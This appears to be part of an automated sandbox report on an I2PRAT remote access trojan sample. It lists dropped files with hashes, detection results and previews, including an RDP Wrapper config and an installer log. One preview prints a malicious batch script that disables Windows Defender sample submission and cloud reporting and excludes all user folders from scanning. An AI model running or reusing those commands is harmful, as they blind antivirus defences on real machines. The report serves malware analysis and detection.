                                                                  SHA-512:0E807AF4D4E0D2F71FB8BE93DFCBCE62F3077E7C94B993529A0012088304A1B34BEDF8915EA23A83611FAB66495B1F8359225DBF95ED3F37C16607257217F191
                                                                  Malicious:false
                                                                  Preview:; RDP Wrapper Library configuration..; Do not modify without special knowledge..; Edited by sebaxakerhtc....[Main]..Updated=2024-11-24..LogFile=\rdpwrap.txt..SLPolicyHookNT60=1..SLPolicyHookNT61=1....[SLPolicy]..TerminalServices-RemoteConnectionManager-AllowRemoteConnections=1..TerminalServices-RemoteConnectionManager-AllowMultipleSessions=1..TerminalServices-RemoteConnectionManager-AllowAppServerMode=1..TerminalServices-RemoteConnectionManager-AllowMultimon=1..TerminalServices-RemoteConnectionManager-MaxUserSessions=0..TerminalServices-RemoteConnectionManager-ce0ad219-4670-4988-98fb-89b14c2f072b-MaxSessions=0..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-MaxSessions=2..TerminalServices-RDP-7-Advanced-Compression-Allowed=1..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-LocalOnly=0..TerminalServices-RemoteConnectionManager-8dc86f1d-9969-4379-91c1-06fe1dc60575-MaxSessions=1000..TerminalServices-DeviceRedirection-Licenses-TS
                                                                  Process:C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):10480965
                                                                  Entropy (8bit):6.710750822103746
                                                                  Encrypted:false
                                                                  SSDEEP:196608:piRu5DnWLX6Cs3E1CPwDvt3uF8c339CMEdy:piRsCKCsU1CPwDvt3uFd9CMEY
                                                                  MD5:458F2D710689EA3CF61D5CD97C6B2470
                                                                  SHA1:BA71901A29F77715A3DC952578F6D249B944FE26
                                                                  SHA-256:47EFC91DA1E9481DB93259248A06349FB3EE58B0C7516A1570F212C3E1CE2119
                                                                  SHA-512:C1884FE6C0FB753D494BC095A43FB9E43DF7F9DB9AD02FCA4F73206D2590A1637119BF2EF5C090F7D502928D56B0838101A9FB56C58B3DB58BDA29D97977F421
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_I2PRAT, Description: Yara detected I2PRAT, Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\update.pkg, Author: Joe Security
                                                                  Preview:.......referrer.wgNj....cnccli.dll.MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*............Y........."h.............................P......JA....`... .........................................^....................................@..l...............................(.......................h............................text...x...........................`..`.data........0....... ..............@....rdata.. d...@...f...*..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..l....@......................@..B....................................................................................................................................
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:modified
                                                                  Size (bytes):64
                                                                  Entropy (8bit):0.34726597513537405
                                                                  Encrypted:false
                                                                  SSDEEP:3:Nlll:Nll
                                                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                  Malicious:false
                                                                  Preview:@...e...........................................................
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):3744
                                                                  Entropy (8bit):5.507463213083565
                                                                  Encrypted:false
                                                                  SSDEEP:96:isYJ9VXDT0HU0Hn0H1D0Cc0He0H+kQHR3fPqve0HMVVHsHz0HMttHMy:DiTzT000H010Cc0+0TQxvPqve0AVMT0y
                                                                  MD5:DE133B012671471FDCFBF3B89907603D
                                                                  SHA1:6AEEE3BC5AC745594B946BE15E883FC7D2F74A7F
                                                                  SHA-256:8F7FFCA12815CD6D6ED5DCE65CD4C6DC0E29D2A0A8B0C3566C81F26F63911C2E
                                                                  SHA-512:EB3C0DD0134CD02975C32C6365FDE6200A015BD66858846311622CB37DD52334171DB0E68413AFE6FCE8C2732E62429CA38BE13CE8D253F8F7D784E83117E03C
                                                                  Malicious:false
                                                                  Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\user\AppData\Local\Temp\installer.log)..[I] (debug_init) -> Done..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffe22170000)..[D] (module_get_proc) -> Done(hnd=0x00007ffe22170000,name=RtlGetVersion,ret=0x00007ffe221ae520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=571c4e6c)..[I] (sys_init) -> Done(sys_uid=c76a8f08571c4e6c,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (fs_path_expand) -> Done(path=%PUBLIC%,xpath=C:\Users\Public,xpath_sz=15)..[I] (fs_dir_create) -> Done(path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\,recursive=1)..[D] (fs_attr_get) -> Done(path=C:\Users\Public\Computer.{20d04fe0-3aea-10
                                                                  Process:C:\Users\user\Desktop\80P.exe
                                                                  File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):10669056
                                                                  Entropy (8bit):7.443816651911507
                                                                  Encrypted:false
                                                                  SSDEEP:98304:RzfenAfcSl0KeEoTnZ4gBu8P1TAB3ruLIb9ly73Ji3vhqNDMmL98fjd3KiY9LeOm:gA/0F5PdyrlSQ5qNDMmYjd3RY9Lesc
                                                                  MD5:2F829F1CB631D234C54F2E6C6F72EB57
                                                                  SHA1:BD76CB633ED42E9E94580E1D995AF2E36D9E1A11
                                                                  SHA-256:09B3B106A22BCB2DF3F09C7A1A082F2FE62927C337C183D3813D21513FB3FA43
                                                                  SHA-512:71C0B077AA63B6DF3A1C2E0A1A0E179DA0466518F2BE6E10871642F03B3B8F63318258DA8C93B78E0CA45C753C3A6524751187FF3D5952D336BE3461651D0CD9
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 70%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................*......................@.............................@.......6....`... ................................................................d............0..............................`...(....................................................text...............................`..`.data....J.......L..................@....rdata...^...P...`...<..............@..@.pdata..d...........................@..@.xdata..............................@..@.bss....p...............................idata.............................@....CRT....`..........................@....tls......... .....................@....reloc.......0.....................@..B................................................................................................................................................................................................................
                                                                  Process:C:\Users\user\Desktop\80P.exe
                                                                  File Type:DOS batch file, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):259
                                                                  Entropy (8bit):4.933902901538645
                                                                  Encrypted:false
                                                                  SSDEEP:6:hJKBnm61gV/eGgLSzomkNgBnm61gV/eGgVPgBnm61PeGgdEYJgrWy+5:unm0gViLUomqsnm0gViaBnm0SuQgrWt
                                                                  MD5:261A842203ADB67547C83DE132C7A076
                                                                  SHA1:6C1A1112D2797E2E66AA5238F00533CD4EB77B3D
                                                                  SHA-256:49ADF0FC74600629F12ADF366ECBACDFF87B24E7F2C8DEA532EA074690EF5F84
                                                                  SHA-512:7787C5F10EC18B8970F22B26F5BB82C4A299928EDB116A0B92FB000F2A141CCB4C8BCAB3AB91D5E3277ABDA8F2D6FE80434E4AEF5EE8A5CD3223CFB9989A6337
                                                                  Malicious:true
                                                                  Preview:@echo off..powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend".powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0".powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath '%HOMEDRIVE%\Users\'"..exit 1
                                                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):129536
                                                                  Entropy (8bit):6.2852879161990645
                                                                  Encrypted:false
                                                                  SSDEEP:1536:UmeFYyUJdEqzx2LVJ4ngXsNXGRqnbxeGqS/h0E0P3j4NBtRLBhBr:UZUJdhxCJ4ngg46weh0dr4vnV
                                                                  MD5:88E6178B0CD434C8D14710355E78E691
                                                                  SHA1:F541979CAD7EE7C6D8F2B87A0F240592A5DC1B82
                                                                  SHA-256:7B40349481AD6C522A23FB3D12D6058EC0A7C5B387348FB4AE85135EE19C91A4
                                                                  SHA-512:C4330A9EE1E69785420AABCFD1991AAAEB0F1764EB7E857F0C86161F61E1FFD467B458A2D458D3C55BB76D00F26FAC481D026443AB0796D0AEF38BF06CD84B8F
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*.<..........Y.........,...................................../*....`... ...................................... ..^....0..D............................p..l...............................(...................p5...............................text....:.......<..................`..`.data........P.......@..............@....rdata.......`.......B..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^.... ......................@..@.idata..D....0......................@....CRT....X....P......................@....tls.........`......................@....reloc..l....p......................@..B........................................................................................................................................................................
                                                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):104448
                                                                  Entropy (8bit):6.236071662185895
                                                                  Encrypted:false
                                                                  SSDEEP:1536:v6YjTy83xoAWVbgh4xf4j0+Fwpj7bx8eSlsfe1tgvEK335:v6Yjqj1gh4xf4w+G7Cge1tgb335
                                                                  MD5:CE579A1BDCB9763DAFEBF01AD29F918C
                                                                  SHA1:F3E317C09E27DD0DA11AEE1578B7034BA1AC15DD
                                                                  SHA-256:0B628EA2BA9CD77621D90A0A7456659ED86C118EB7655F6074B3B5648BAC0A02
                                                                  SHA-512:EB688ED1A4AC5C3B975C2B005BE4BFD04D7CC762AF18DED190D0F903D39BDB301EADB800866BA72F6B8C36B7ABFB5765E0EB5081158C67BC33F056BD41280BC3
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*............Y.........?..............................0......Uu....`... .........................................^.......................$............ ..l........................... v..(.......................`............................text...............................`..`.data...............................@....rdata...a... ...b..................@..@.pdata..$............h..............@..@.xdata..T............r..............@..@.bss.... ................................edata..^............|..............@..@.idata...............~..............@....CRT....X...........................@....tls................................@....reloc..l.... ......................@..B........................................................................................................................................................................
                                                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):91136
                                                                  Entropy (8bit):6.2041507656664825
                                                                  Encrypted:false
                                                                  SSDEEP:1536:SgYI/+tvE0A2HTsPtbNqnXi2h+t3w8S31+g5KvSxY:SgYIl2HIPtbNkrhPl+4K6e
                                                                  MD5:CB4F460CF2921FCD35AC53F4154FCBE0
                                                                  SHA1:AFD91433EF0C03315739FB754B16D6C49D2E51F2
                                                                  SHA-256:D6B5B5303D7079CF31EA9704E7711A127CFE936EA108CDFFF938C7811C6EDA31
                                                                  SHA-512:BEE872D6B1226409C472636255AE220BA8E0950C0D65DD0D8B9F3E90D43B65FFE2133B33648452C34A3F1BCA958F10BAF3FADBA5BF4228057928F4EEAC7AB600
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*.....`......Y.....................................................`... ..............................................................`..................d............................I..(......................h............................text...X...........................`..`.data...............................@....rdata.. T.......V..................@..@.pdata.......`.......8..............@..@.xdata..4....p.......B..............@..@.bss....@................................edata...............L..............@..@.idata...............N..............@....CRT....X............^..............@....tls.................`..............@....reloc..d............b..............@..B........................................................................................................................................................................
                                                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):9146880
                                                                  Entropy (8bit):6.674868432808522
                                                                  Encrypted:false
                                                                  SSDEEP:196608:DiRu5DnWLX6Cs3E1CPwDvt3uF8c339CME:DiRsCKCsU1CPwDvt3uFd9CME
                                                                  MD5:676064A5CC4729E609539F9C9BD9D427
                                                                  SHA1:F77BA3D5B6610B345BFD4388956C853B99C9EB60
                                                                  SHA-256:77D203E985A0BC72B7A92618487389B3A731176FDFC947B1D2EAD92C8C0E766B
                                                                  SHA-512:4C876E9C1474E321C94EA81058B503D695F2B5C9DCA9182C515F1AE6DE065099832FD0337D011476C553958808C7D6F748566734DEEE6AF1E74B45A690181D02
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f..........."...).t]......R..0........................................P............`... .......................................z..t... ...,............p..?...........p...............................`m.(....................*...............................text...(r]......t].................`..`.data.........]......x].............@....rdata..`>...@^..@....^.............@..@.pdata...?....p..@...^p.............@..@.xdata...t....t..v....t.............@..@.bss....`Q...@z..........................edata...t....z..v....z.............@..@.idata...,... ......................@....CRT....`....P......................@....tls.........`......................@....reloc.......p......................@..B........................................................................................................................................................................
                                                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):75977
                                                                  Entropy (8bit):7.8696816318811385
                                                                  Encrypted:false
                                                                  SSDEEP:1536:07klNoOPsg0evjAYqVwbLhhOW6xwz0U0paUgfVnsHk:EkPNPmevj5qabL9ydgNz
                                                                  MD5:E53A179BB45CD7EDD8371740D65076BD
                                                                  SHA1:6B74034746E12C2058614A9DF671C31B79EAA7E9
                                                                  SHA-256:C33D095DBFFC43047A7930EB0811B11208D166FCFD612D8ED32556A6CE82B9DB
                                                                  SHA-512:767105F8B88CD8C9E4E2BD9188C8174D5FD86D370D2E6A79B0E10EF4A79E994F24F8DB7A79C481B97F69DBEA8E311590E3B2D31E804EC5F572A3C37CF3EBC457
                                                                  Malicious:false
                                                                  Preview:I2Psu3................&.................1733281205......reseed@cnc.netPK........./.Y.o2*........;...routerInfo-eXkkiGm0Hskmt-0nixI7Fd2~NX5o5Laplk3k9Fh6Jr0=.dat..|f........59/}.w...............X.O..Q#.....M;`vv...oZ..;...U....gm..w._.y.......g.\....T..9<....v{...].K..Z..`....W..kX..7iu..bi..)..<.E.{.g..Q..v...RU....f.:~U-r.v.0.?I.c..S.W"U...P..9..*!..=+....oY..gY....m;t...n..mu.y...$q...,.?.._..v.n.z..m......Q....x....\..f.M.E31.[.xu._....K...:.1.i.i"..{c:>.YU.x...Gl.F.+......<..t..r....M....t....iy=....c0wWG.....-.lW.{.....w..\.g.2.0..1.......L..P....j.X..XPl..db.i..f`f....Y.o....T.P....._..d..f....h._..ik..ZQ``.ehnlldajd`..2.....C..`B.&.f.....:.n........)>.i...Q.I.a.f...N..ai.Ynn..f.I&. -..:.y.y^....N...N....~e!.^a...y.ai.n..i..`-F.:.UNf.e.&I..N...y...y.....>%n&en.......fU`..$..|dinjb`.$ B@.......X.Y.B..l9,,....L,...mu....s3....."...r<+.=...C.."...R.."LS..3.+...0..2.Y...../.9.......&`..-M.,.K\+...M2....}.#.........+s..".K.M`.20.@.3 .5/
                                                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):115712
                                                                  Entropy (8bit):6.25860377459178
                                                                  Encrypted:false
                                                                  SSDEEP:1536:+8zEo3EM0MBfGCqx22eMO4HROUeS2qjVO+n98TLmifu:LzEms12D4xOU31n98TLmh
                                                                  MD5:BD1D98C35FE2CB3E14A655AEDE9D4B01
                                                                  SHA1:49361C09F5A75A4E2D6E85FBDA337FC521770793
                                                                  SHA-256:961C65CFDF0187A945AD6099EFD9AF68D46D36EC309A2243F095EF739EE9AC7E
                                                                  SHA-512:74BFD70A08E2CB86AF10B83D0CFD723A24613C9E6E2018CDC63BD425D45845C1214BF68115E04F95572684F27A0CF52D271E2419F8056E0A0467B88507D132D4
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*............Y........................................P.......p....`... .........................................^....................................@..p...............................(...................X................................text...8...........................`..`.data........0......."..............@....rdata..pi...@...j...$..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..p....@......................@..B........................................................................................................................................................................
                                                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):4
                                                                  Entropy (8bit):2.0
                                                                  Encrypted:false
                                                                  SSDEEP:3:9:9
                                                                  MD5:006F29D8E822B9241020AEC2495EF819
                                                                  SHA1:6510BEB08A14B6BCC74D32031C1B19AA07169CF1
                                                                  SHA-256:69FF245F90727BBEFA5B1F82E2429FF74F31A6A5385B5129A2FE3378DCF200F1
                                                                  SHA-512:16916BC4477F6FC1AE1132D2F5D2B9587650DC44E23DE15E0FE787AFE23175E0E236C020C753BA5158F688BEACDA523AAFB7EC1DF82B6F7619573C90A48742E8
                                                                  Malicious:false
                                                                  Preview:wgNj
                                                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                  File Type:Generic INItialization configuration [cnccli]
                                                                  Category:dropped
                                                                  Size (bytes):213
                                                                  Entropy (8bit):5.129024990254676
                                                                  Encrypted:false
                                                                  SSDEEP:6:1EVQLD4oWuJO+70XZ6DIzOD7kXpTRL9gWVUDeLn:Cjo5JO+70XZmeC7kX9vgpKL
                                                                  MD5:7D88563AD41BAF4026CFC5D098CBF40D
                                                                  SHA1:442756834CCCEB84F219F3C762852437FBB3458E
